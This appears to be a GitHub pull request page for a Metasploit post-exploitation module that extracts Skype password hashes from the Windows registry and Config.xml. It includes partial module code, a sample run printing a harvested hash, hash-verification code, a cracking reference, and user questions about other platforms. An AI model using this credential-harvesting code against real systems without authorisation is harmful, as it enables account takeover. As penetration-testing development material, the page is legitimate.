Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

skype post module to extract password hash #3473

Merged
merged 8 commits into from Jul 2, 2014

Conversation

Projects
None yet
8 participants
Contributor

mubix commented Jun 23, 2014

Pulls out the MD5(user,"\nskyper\n",pass) hash from Config.xml and Registry

The "Q" pack operator is host-architecture dependent. IOW, this would be inverted on a big-endian system.

Unpack as VV, shift the most-significant dword, and add.

Could simplify as Digest::SHA1.digest("\x00\x00\x00\x00" + salt) + Digest::SHA1.digest("\x00\x00\x00\x01" + salt)

Dont use aes.final[], instead, do xor_key << aes.final() and then aes_key[0, 16] for XOR key

Contributor

mubix commented Jun 23, 2014

All comments so far have been addressed

Note: Should probably promote the CryptUnprotectData up into a function due to the code reuse already, as well as make the Q pack/unpack into a library function somewhere, but that is for another day.

Example run:
Password is: test

msf post(skype) > rerun
[*] Reloading module...

[*] Checking for encrypted salt in the registry
[+] Salt found and decrypted
[*] Checking for config files in %APPDATA%
[+] Found Config.xml in C:\Users\user\AppData\Roaming\Skype\user_8675309\
[*] Parsing C:\Users\user\AppData\Roaming\Skype\user_8675309\Config.xml
[+] Skype MD5 found: user_8675309:bd20f262770d8f30fb76f609a149cceb
[*] Post module execution completed
msf post(skype) > 

Verify with code:

require 'openssl'

username = "user_8675309"
passsword = "test"

hash = Digest::MD5.new
hash.update username
hash.update "\nskyper\n"
hash.update password

puts "#{username}:#{hash.hexdigest}"

Contributor

jlee-r7 commented Jun 24, 2014

The pack side exists in Rex::Text.pack_int64le. Unpacking seems to be missing, though. =(

Contributor

mubix commented Jun 25, 2014

For posterity, in case anyone wanted to know how to crack it: http://www.openwall.com/lists/john-users/2014/06/25/2

Contributor

mubix commented Jun 25, 2014

@jlee-r7 fixed it up for the rex pack version, module still works as expected.

@wchen-r7 wchen-r7 commented on an outdated diff Jun 27, 2014

modules/post/windows/gather/credentials/skype.rb
+ def get_salt
+ print_status "Checking for encrypted salt in the registry"
+ vprint_status "Checking: HKCU\\Software\\Skype\\ProtectedStorage - 0"
+ rdata = registry_getvaldata('HKCU\\Software\\Skype\\ProtectedStorage', '0')
+ print_good("Salt found and decrypted")
+ return decrypt_reg(rdata)
+ end
+
+ # Pull out all the users in the AppData directory that have config files
+ def get_config_users(appdatapath)
+ users = []
+ dirlist = session.fs.dir.entries(appdatapath)
+ dirlist.shift(2)
+ dirlist.each do |dir|
+ begin
+ session.fs.file.stat(appdatapath + "\\#{dir}" + '\\config.xml')
@wchen-r7

wchen-r7 Jun 27, 2014

Contributor

Instead of this, you can use the file?() method to check if a file exists or not.

Reference:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb#L69

@todb-r7 todb-r7 added the module label Jun 29, 2014

Contributor

mubix commented Jul 1, 2014

@wchen-r7 fixed, thanks for the catch

Contributor

wchen-r7 commented Jul 1, 2014

Thank you.

Contributor

mubix commented Jul 2, 2014

Anything else need to change?

Contributor

wchen-r7 commented Jul 2, 2014

Looks okay to me. I'll land this today.

@wchen-r7 wchen-r7 self-assigned this Jul 2, 2014

@wchen-r7 wchen-r7 merged commit d341fc2 into rapid7:master Jul 2, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Jul 2, 2014

@mubix mubix deleted the mubix:skype_pass branch Jul 10, 2014

Help please with usage module.

System: Windows 8.1 x64
Off all firewalls and Antiviruses
Create file c:\metasploit\apps\pro\modules\post\pro\windows\gather\credentials\skype.rb
Run console Metasploit Pro (trial)

msf pro> search skype
msf pro> use post\windows\gather\credentials\skype
msf post(skype) > rerun
[*] Reloading module...
[-] Post Failed: Msf::OptionValidateError The following options failed to validate: SESSION

Sorry my noobs Question....
But i dont know, what i can do with this problem?

Help me please, i don't can `t remember the password for running Skype.
and access to e-mail which also checked no, the domain is long dead.
Mail is non-existent.
I beg you to help.
You wrote a very necessary program, but I do not to understand how to use it.
I ask you to write very guide for dummies.
Many thanks in advance.
Sorry for bad english, I'm Ukrainian.

bugsyb commented Feb 7, 2016

The above pulls data on Windows systems from HKEY_CURRENT_USER\Software\Skype\ProtectedStorage, but from where the data same data should be pulled from on Android devices?
Does anyone know this part?

lfaoro commented May 16, 2016

do you guys know where the Salt is on the mac?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment